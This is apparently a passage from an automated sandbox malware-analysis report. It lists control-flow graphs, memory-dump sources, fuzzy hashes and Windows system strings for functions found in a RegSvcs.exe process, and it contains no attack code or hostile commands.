                                                                          • Not Executed
                                                                          control_flow_graph 6 42e43e-42e45a 7 42e469-42e470 6->7 8 42e464 call 42e933 6->8 9 42e47f-42e484 7->9 8->7 10 42e486-42e48f 9->10 11 42e4de-42e4e3 9->11 12 42e49e-42e4a3 10->12 13 42e4b6-42e4db 12->13 14 42e4a5-42e4ad 12->14 13->11 15 42e4b3 14->15 15->13
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                                          • Instruction ID: 404c73420e7ccc61c58b20341cebbccbd52cb142bdd450d9b6ac3c885e858c85
                                                                          • Opcode Fuzzy Hash: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                                          • Instruction Fuzzy Hash: 42019671D021246AFB60EB95AC42FDDB3B49B08305F400ADAE508A2581EF78A7888B55
                                                                          Function 0042E7F7 Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 30 42e7f7-42e801 31 42e803-42e82e 30->31 32 42e834-42e845 31->32
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                                          • Instruction ID: 31242dfcbd3f96dd699b4558cde109ee15ad417a935ac94cd5934c0012438835
                                                                          • Opcode Fuzzy Hash: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                                          • Instruction Fuzzy Hash: C0F03A7661030AAFDB04CF55D885EEBB3ADBB88350F44C219FD198B641EB75E910CBA0
                                                                          Function 0042E969 Relevance: .0, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 33 42e969-42e988 34 42e98e-42e995 33->34 35 42e997-42e999 34->35 36 42e9a9-42e9ac 34->36 35->36 37 42e99b-42e9a7 call 42e933 35->37 37->36
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                                          • Instruction ID: 9450f4893f1b544faf21d748d5bf1faa69d539990d9b7b546b78aef50944f596
                                                                          • Opcode Fuzzy Hash: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                                          • Instruction Fuzzy Hash: 25E09B72F412246BD7209666AC05FABB768DFD1760F18007FFD0897341E175585087D9
                                                                          Function 0042E973 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 42 42e973-42e988 43 42e98e-42e995 42->43 44 42e997-42e999 43->44 45 42e9a9-42e9ac 43->45 44->45 46 42e99b-42e9a7 call 42e933 44->46 46->45
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                                          • Instruction ID: b45b16270b7c92ecc088d3bbc55ba942c8e19ef5250ac7cf6bfce4062317808b
                                                                          • Opcode Fuzzy Hash: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                                          • Instruction Fuzzy Hash: 04E0D87270022427D620554AAC05FAB735C9FC0B20F48002BFE0897301D164A84082E9
                                                                          Function 0042E803 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 40 42e803-42e82e 41 42e834-42e845 40->41
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                                          • Instruction ID: ed3f3c4a1f71d5893b28c54a4458e4a2cb9e16b5f970c0aa03921f96b0cc64a3
                                                                          • Opcode Fuzzy Hash: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                                          • Instruction Fuzzy Hash: EFF098B6610209AFDB04CF59D885EEB73A9BB88750F048559FD198B241D774EA108BA1
                                                                          Function 0042E893 Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 49 42e893-42e8a6 50 42e8ac-42e8b0 49->50
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2408755333.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_42e000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                                          • Instruction ID: 3eca5127519bf68b1d5e67e2a562a6eab0631c4a37908332f397cdab7da05a69
                                                                          • Opcode Fuzzy Hash: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                                          • Instruction Fuzzy Hash: 9AC012716002086BDB00DA88DC46F66339C9748610F444455B91C8B241D571B9504698

                                                                          Non-executed Functions

                                                                          Function 01164A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 51 1164a80-1164a8b 52 1164a9f-1164aa6 51->52 53 1164a8d-1164a99 RtlDebugPrintTimes 51->53 54 1164aaf-1164ab6 call 114f5a0 52->54 55 1164aa8-1164aae 52->55 53->52 58 1164b25-1164b26 53->58 60 1164b23 54->60 61 1164ab8-1164b22 call 1151e46 * 2 54->61 60->58 61->60
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
                                                                          • API String ID: 3446177414-2083360775
                                                                          • Opcode ID: 72e0f63a4bc06a7de2ab73ed31ddacaeba94e5c0287d1e65196182ba8f04a162
                                                                          • Instruction ID: 485f30d333f6dfeff780f12e2efac5f6bb0e097fd5c89b1e63e95d6ad4dff40e
                                                                          • Opcode Fuzzy Hash: 72e0f63a4bc06a7de2ab73ed31ddacaeba94e5c0287d1e65196182ba8f04a162
                                                                          • Instruction Fuzzy Hash: 1501B532E542146BDF29DB2CB82C7862AD1B7A9728F1900ADED089B288DB614CC1D391
                                                                          Function 01162890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 262 1162890-11628b3 263 119a4bc-119a4c0 262->263 264 11628b9-11628cc 262->264 263->264 265 119a4c6-119a4ca 263->265 266 11628ce-11628d7 264->266 267 11628dd-11628df 264->267 265->264 268 119a4d0-119a4d4 265->268 266->267 269 119a57e-119a585 266->269 270 11628e1-11628e5 267->270 268->264 271 119a4da-119a4de 268->271 269->267 272 11628eb-11628fa 270->272 273 1162988-116298e 270->273 271->264 274 119a4e4-119a4eb 271->274 275 119a58a-119a58d 272->275 276 1162900-1162905 272->276 277 1162908-116290c 273->277 278 119a4ed-119a4f4 274->278 279 119a564-119a56c 274->279 275->277 276->277 277->270 280 116290e-116291b 277->280 282 119a50b 278->282 283 119a4f6-119a4fe 278->283 279->264 281 119a572-119a576 279->281 284 1162921 280->284 285 119a592-119a599 280->285 281->264 286 119a57c call 1170050 281->286 288 119a510-119a536 call 1170050 282->288 283->264 287 119a504-119a509 283->287 289 1162924-1162926 284->289 293 119a5a1-119a5c9 call 1170050 285->293 304 119a55d-119a55f 286->304 287->288 288->304 290 1162993-1162995 289->290 291 1162928-116292a 289->291 290->291 299 1162997-11629b1 call 1170050 290->299 295 1162946-1162966 call 1170050 291->295 296 116292c-116292e 291->296 311 1162969-1162974 295->311 296->295 301 1162930-1162944 call 1170050 296->301 299->311 301->295 308 1162981-1162985 304->308 311->289 313 1162976-1162979 311->313 313->293 314 116297f 313->314 314->308
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID:
                                                                          • API String ID: 48624451-0
                                                                          • Opcode ID: 2ffddb0a35f4133ba196b4b37f91d802fbc65dc3e73c794b34b306dd9b87b5a3
                                                                          • Instruction ID: 2ba4efefba175c9783a044ff9f5260d99f295b6afb249f79cc2384b97eaa1d91
                                                                          • Opcode Fuzzy Hash: 2ffddb0a35f4133ba196b4b37f91d802fbc65dc3e73c794b34b306dd9b87b5a3
                                                                          • Instruction Fuzzy Hash: D451F5B2A00216AFDB1DDB9C8C9097EFBBCBB49240714C229E4A5D7645E375DE148BA0
                                                                          Function 0113A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 315 113a250-113a26f 316 113a275-113a291 315->316 317 113a58d-113a594 315->317 319 113a297-113a2a0 316->319 320 11879e6-11879eb 316->320 317->316 318 113a59a-11879bb 317->318 318->316 323 11879c1-11879c6 318->323 319->320 322 113a2a6-113a2ac 319->322 324 113a2b2-113a2b4 322->324 325 113a6ba-113a6bc 322->325 326 113a473-113a479 323->326 324->320 328 113a2ba-113a2bd 324->328 327 113a6c2 325->327 325->328 329 113a2c3-113a2c6 327->329 328->320 328->329 330 113a2da-113a2dd 329->330 331 113a2c8-113a2d1 329->331 334 113a2e3-113a32b 330->334 335 113a6c7-113a6d0 330->335 332 11879cb-11879d5 331->332 333 113a2d7 331->333 336 11879da-11879e3 call 11af290 332->336 333->330 337 113a330-113a335 334->337 335->334 338 113a6d6-11879ff 335->338 336->320 341 113a33b-113a343 337->341 342 113a47c-113a47f 337->342 338->336 344 113a345-113a349 341->344 345 113a34f-113a35d 341->345 342->345 346 113a485-113a488 342->346 344->345 347 113a59f-113a5a8 344->347 348 113a363-113a368 345->348 349 113a48e-113a49e 345->349 346->349 350 1187a16-1187a19 346->350 352 113a5c0-113a5c3 347->352 353 113a5aa-113a5ac 347->353 354 113a36c-113a36e 348->354 349->350 351 113a4a4-113a4ad 349->351 350->354 355 1187a1f-1187a24 350->355 351->354 357 1187a01 352->357 358 113a5c9-113a5cc 352->358 353->345 356 113a5b2-113a5bb 353->356 359 113a374-113a38c call 113a6e0 354->359 360 1187a26 354->360 361 1187a2b 355->361 356->354 364 1187a0c 357->364 363 113a5d2-113a5d5 358->363 358->364 368 113a4b2-113a4b9 359->368 369 113a392-113a3ba 359->369 360->361 362 1187a2d-1187a2f 361->362 362->326 366 1187a35 362->366 363->353 364->350 370 113a4bf-113a4c2 368->370 371 113a3bc-113a3be 368->371 369->371 370->371 372 113a4c8-113a4d3 370->372 371->362 373 113a3c4-113a3cb 371->373 372->337 374 113a3d1-113a3d4 373->374 375 1187ae0 373->375 376 113a3e0-113a3ea 374->376 377 1187ae4-1187afc call 11af290 375->377 376->377 378 113a3f0-113a40c call 113a840 376->378 377->326 383 113a412-113a417 378->383 384 113a5d7-113a5e0 378->384 383->326 385 113a419-113a43d 383->385 386 113a5e2-113a5eb 384->386 387 113a601-113a603 384->387 388 113a440-113a443 385->388 386->387 389 113a5ed-113a5f1 386->389 390 113a605-113a623 call 1124508 387->390 391 113a629-113a631 387->391 393 113a449-113a44c 388->393 394 113a4d8-113a4dc 388->394 395 113a681-113a6ab RtlDebugPrintTimes 389->395 396 113a5f7-113a5fb 389->396 390->326 390->391 400 113a452-113a454 393->400 401 1187ad6 393->401 398 113a4e2-113a4e5 394->398 399 1187a3a-1187a42 394->399 395->387 414 113a6b1-113a6b5 395->414 396->387 396->395 403 113a634-113a64a 398->403 404 113a4eb-113a4ee 398->404 402 1187a48-1187a4c 399->402 399->403 405 113a520-113a539 call 113a6e0 400->405 406 113a45a-113a461 400->406 401->375 402->403 408 1187a52-1187a5b 402->408 409 113a650-113a659 403->409 410 113a4f4-113a50c 403->410 404->393 404->410 424 113a53f-113a567 405->424 425 113a65e-113a665 405->425 412 113a467-113a46c 406->412 413 113a57b-113a582 406->413 416 1187a5d-1187a60 408->416 417 1187a85-1187a87 408->417 409->400 410->393 418 113a512-113a51b 410->418 412->326 420 113a46e 412->420 413->376 415 113a588 413->415 414->387 415->375 421 1187a6e-1187a71 416->421 422 1187a62-1187a6c 416->422 417->403 423 1187a8d-1187a96 417->423 418->400 420->326 429 1187a7e 421->429 430 1187a73-1187a7c 421->430 428 1187a81 422->428 423->400 427 113a569-113a56b 424->427 426 113a66b-113a66e 425->426 425->427 426->427 431 113a674-113a67c 426->431 427->412 432 113a571-113a573 427->432 428->417 429->428 430->423 431->388 433 1187a9b-1187aa4 432->433 434 113a579 432->434 433->434 435 1187aaa-1187ab0 433->435 434->413 435->434 436 1187ab6-1187abe 435->436 436->434 437 1187ac4-1187acf 436->437 437->436 438 1187ad1 437->438 438->434
                                                                          Strings
                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011879FA
                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 011879D0, 011879F5
                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011879D5
                                                                          • SsHd, xrefs: 0113A3E4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                          • API String ID: 0-929470617
                                                                          • Opcode ID: f4f79f57adb79422fd90b917157567f307b9f3ace3f00aff55d6cbc58fb0a1b3
                                                                          • Instruction ID: 0ba232c0d5b3d5cf41f058b6593831bc9f36888f55839b95f86a9e8ad3c5788f
                                                                          • Opcode Fuzzy Hash: f4f79f57adb79422fd90b917157567f307b9f3ace3f00aff55d6cbc58fb0a1b3
                                                                          • Instruction Fuzzy Hash: 62E1D3716083028FD72DCE28D484B6ABBE0AFC5324F194A2DE9E5CB2D5E731D945CB42
                                                                          Function 0113D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 439 113d770-113d7ab 440 113d7b1-113d7bb 439->440 441 113d9e7-113d9ee 439->441 442 113d7c1-113d7ca 440->442 443 1189357 440->443 441->440 444 113d9f4-118932c 441->444 442->443 446 113d7d0-113d7d3 442->446 450 1189361-1189370 443->450 444->440 449 1189332-1189337 444->449 447 113d9da-113d9dc 446->447 448 113d7d9-113d7db 446->448 451 113d7e1-113d7e4 447->451 453 113d9e2 447->453 448->443 448->451 452 113d927-113d938 call 1164c30 449->452 454 118934b-1189354 call 11af290 450->454 451->443 455 113d7ea-113d7ed 451->455 453->455 454->443 458 113d7f3-113d7f6 455->458 459 113d9f9-113da02 455->459 463 113da0d-113da16 458->463 464 113d7fc-113d848 call 113d660 458->464 459->458 462 113da08-1189346 459->462 462->454 463->464 466 113da1c 463->466 464->452 469 113d84e-113d852 464->469 466->450 469->452 470 113d858-113d85f 469->470 471 113d9d1-113d9d5 470->471 472 113d865-113d869 470->472 473 1189563-118957b call 11af290 471->473 474 113d870-113d87a 472->474 473->452 474->473 475 113d880-113d887 474->475 477 113d889-113d88d 475->477 478 113d8ed-113d90d 475->478 480 113d893-113d898 477->480 481 1189372 477->481 482 113d910-113d913 478->482 483 1189379-118937b 480->483 484 113d89e-113d8a5 480->484 481->483 485 113d915-113d918 482->485 486 113d93b-113d940 482->486 483->484 489 1189381-11893aa 483->489 490 11893ea-11893ed 484->490 491 113d8ab-113d8e3 call 1168250 484->491 492 1189559-118955e 485->492 493 113d91e-113d920 485->493 487 113d946-113d949 486->487 488 11894d3-11894db 486->488 494 113da21-113da2f 487->494 495 113d94f-113d952 487->495 488->494 496 11894e1-11894e5 488->496 489->478 497 11893b0-11893ca call 11782c0 489->497 499 11893f1-1189400 call 11782c0 490->499 513 113d8e5-113d8e7 491->513 492->452 500 113d922 493->500 501 113d971-113d98c call 113a6e0 493->501 502 113d954-113d964 494->502 505 113da35-113da3e 494->505 495->485 495->502 496->494 503 11894eb-11894f4 496->503 497->513 518 11893d0-11893e3 497->518 523 1189402-1189410 499->523 524 1189417 499->524 500->452 520 1189528-118952d 501->520 521 113d992-113d9ba 501->521 502->485 509 113d966-113d96f 502->509 510 1189512-1189514 503->510 511 11894f6-11894f9 503->511 505->493 509->493 510->494 522 118951a-1189523 510->522 516 11894fb-1189501 511->516 517 1189503-1189506 511->517 513->478 519 1189420-1189424 513->519 516->510 526 1189508-118950d 517->526 527 118950f 517->527 518->497 528 11893e5 518->528 519->478 525 118942a-1189430 519->525 529 113d9bc-113d9be 520->529 530 1189533-1189536 520->530 521->529 522->493 523->499 531 1189412 523->531 524->519 532 1189432-118944f 525->532 533 1189457-1189460 525->533 526->522 527->510 528->478 534 1189549-118954e 529->534 535 113d9c4-113d9cb 529->535 530->529 536 118953c-1189544 530->536 531->478 532->533 537 1189451-1189454 532->537 538 1189462-1189467 533->538 539 11894a7-11894a9 533->539 534->452 540 1189554 534->540 535->471 535->474 536->482 537->533 538->539 541 1189469-118946d 538->541 542 11894ab-11894c6 call 1124508 539->542 543 11894cc-11894ce 539->543 540->492 544 118946f-1189473 541->544 545 1189475-11894a1 RtlDebugPrintTimes 541->545 542->452 542->543 543->452 544->539 544->545 545->539 549 11894a3 545->549 549->539
                                                                          APIs
                                                                          Strings
                                                                          • GsHd, xrefs: 0113D874
                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0118936B
                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 01189341, 01189366
                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01189346
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                          • API String ID: 3446177414-576511823
                                                                          • Opcode ID: c5080765502bf6dc7be107d9543e7ae5f1d7972318cd4d484957d28f7ca33576
                                                                          • Instruction ID: b7d34b8b39d6e64646bcccff03cbfcc1e526c135d41a45225c8090a618cac80e
                                                                          • Opcode Fuzzy Hash: c5080765502bf6dc7be107d9543e7ae5f1d7972318cd4d484957d28f7ca33576
                                                                          • Instruction Fuzzy Hash: F9E1C4706083468FDB19CFA8D880B6ABBF5BFC8318F44496DE9958B285D770E944CF52
                                                                          Function 0116B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 550 116b5ec-116b5fc 551 116b600-116b602 550->551 552 116b5fe 550->552 553 116b830-116b844 call 1164b87 551->553 554 116b608-116b60d 551->554 552->551 555 116b621-116b62e 554->555 556 116b60f-116b612 554->556 559 116b631-116b63d call 116b5e6 555->559 556->553 558 116b618-116b61b 556->558 558->553 558->555 563 116b63f-116b644 559->563 564 116b64a-116b653 559->564 563->563 565 116b646-116b648 563->565 566 116b655-116b658 564->566 567 116b65a-116b65d 564->567 565->559 568 116b65f-116b662 566->568 567->568 569 116b665-116b66d 567->569 568->569 570 116b690-116b693 569->570 571 116b66f-116b672 569->571 574 116b695-116b698 570->574 575 116b6ad-116b6d4 call 1166810 570->575 572 116b674 571->572 573 116b67c-116b680 571->573 576 116b676-116b67a 572->576 577 116b682-116b684 573->577 578 116b68a-116b68d 573->578 574->575 579 116b69a-116b69e 574->579 585 116b6d7-116b6e9 call 116b5e6 575->585 576->575 577->578 581 116b686-116b688 577->581 578->570 582 116b6a4-116b6aa 579->582 583 116b6a0-116b6a2 579->583 581->576 582->575 583->575 583->582 588 116b6f3-116b704 call 116b5e6 585->588 589 116b6eb-116b6f1 585->589 595 116b791-116b794 588->595 596 116b70a-116b713 588->596 590 116b71b-116b727 589->590 593 116b797 590->593 594 116b729-116b735 590->594 597 116b79a-116b79e 593->597 598 116b766-116b769 594->598 599 116b737 594->599 595->593 601 116b715 596->601 602 116b718 596->602 603 116b7a0-116b7a2 597->603 604 116b7ad-116b7b0 597->604 600 116b76c-116b786 call 1166580 598->600 605 116b73e-116b741 599->605 606 116b739-116b73c 599->606 626 116b789-116b78c 600->626 601->602 602->590 608 116b7a7-116b7ab 603->608 609 116b7a4 603->609 612 116b7b2-116b7b5 604->612 613 116b7df-116b7ed call 11ad8b0 604->613 610 116b757-116b762 605->610 611 116b743-116b746 605->611 606->598 606->605 619 116b815-116b81a 608->619 609->608 610->597 616 116b764 610->616 611->610 620 116b748-116b74e 611->620 614 116b7b7-116b7ba 612->614 615 116b80f 612->615 634 116b7f7-116b7fa 613->634 635 116b7ef-116b7f5 613->635 622 116b7ce-116b7d3 614->622 623 116b7bc-116b7c1 614->623 621 116b812 615->621 616->626 624 116b81e-116b821 619->624 625 116b81c 619->625 620->600 628 116b750 620->628 621->619 622->615 633 116b7d5 622->633 623->613 630 116b7c3-116b7c6 623->630 631 116b823-116b827 624->631 632 116b829-116b82f 624->632 625->624 626->585 628->610 629 116b752-116b755 628->629 629->600 629->610 630->621 636 116b7c8-116b7ca 630->636 631->632 633->613 637 116b7d7-116b7dd 633->637 638 116b805-116b80d 634->638 639 116b7fc-116b803 634->639 635->619 636->613 640 116b7cc 636->640 637->613 637->621 638->619 639->619 640->621
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                          • Instruction ID: 29756dc2e69fc6a16e1ea0c907cc392b281841179cca39f741f793cce2c74249
                                                                          • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                          • Instruction Fuzzy Hash: 9081C170F092498EEF2D8E6CC8517FEBBAEAF45320F184119D951E72D1C73A8860CB59
